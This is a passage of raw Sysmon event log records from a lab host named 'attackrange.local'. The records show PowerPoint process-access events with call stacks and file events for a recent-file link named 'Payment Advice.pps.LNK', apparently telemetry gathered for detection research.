Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000082037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000082033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000082032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Payment Advice.pps.LNK2021-04-20 14:59:17.965 23542300x800000000000000082031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Payment Advice.pps.LNKMD5=99AD7B449F60BAC5793B219CC93C3724,SHA256=CBB3A08AF86E21241E033862406423F1323F0D1AEB34AB7D3B5DA5DB5E1057F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000082027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000082023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+171086|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft 